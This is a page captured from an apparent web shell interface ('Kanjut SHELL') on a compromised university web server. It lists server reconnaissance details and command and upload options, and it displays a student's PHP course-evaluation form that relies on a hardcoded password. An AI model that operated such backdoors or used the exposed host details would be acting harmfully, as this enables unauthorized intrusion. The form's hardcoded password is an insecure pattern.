Kanjut SHELL
Server IP : 172.16.15.8  /  Your IP : 18.223.213.76
Web Server : Apache
System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 7.2.24
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /home/clang/www/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : //home/clang/www/evalFormA.php
<?php   session_start();

/*      evalFormA.php

        Author: Casey Lang
        Instructor: Dr. Wang
        Due: April 17, 2022
        Goal: Include the following input
boxes: four radio buttons for the student's status (freshman, sophomore, junior, and
senior), one text box for the course, and three radio buttons for the course evaluations
(poor, average, and good) for various questions. If the poor button is selected, the value of 0 will be inserted
to the score field of the table. If the average button is selected, the value of 1 will be
inserted into the score field. If the good button is selected, the value of 2 will be
inserted into the score field. 
*/


       
        $pass = $_SESSION['psw'];
        if($pass != "project")
                print "go away.";
        else
        {
?>

<CENTER>
<h2>
Evaluation Form
</h2>
<hr>
<Font color=blue size=4>
<Form action=evalFormB.php method=post>
Gender: <input type=radio name=gender value=Male> Male
<input type=radio name=gender value=Female> Female <P>
Status: <input type=radio name=status value=Freshman> Freshman
<input type=radio name=status value=Sophomore> Sophomore
<input type=radio name=status value=Junior> Junior
<input type=radio name=status value=Senior> Senior <P>
Course: <input type=text size=8 name=course> <P>
How would you rate your enjoyment of this course?<P> <input type=radio name=like value=0> Poor
<input type=radio name=like value=1> Average
<input type=radio name=like value=2> Good <P>
<P>

How would you rate the usefulness of this course?<P> <input type=radio name=useful value=0> Poor
<input type=radio name=useful value=1> Average
<input type=radio name=useful value=2> Good <P>
<P>

How would you rate the workload for this course?<P> <input type=radio name=workload value=0> Poor
<input type=radio name=workload value=1> Average
<input type=radio name=workload value=2> Good <P>
<P>


<HR>
<input type=submit value=Submit>
<input type=reset value=Reset><P>
<A HREF=project5.php> Return to Homepage </A> | <A HREF=evalFormB.php> Display Table </A>
</Form>
</CENTER>
<?PHP
}
?>


Stv3n404 - 2023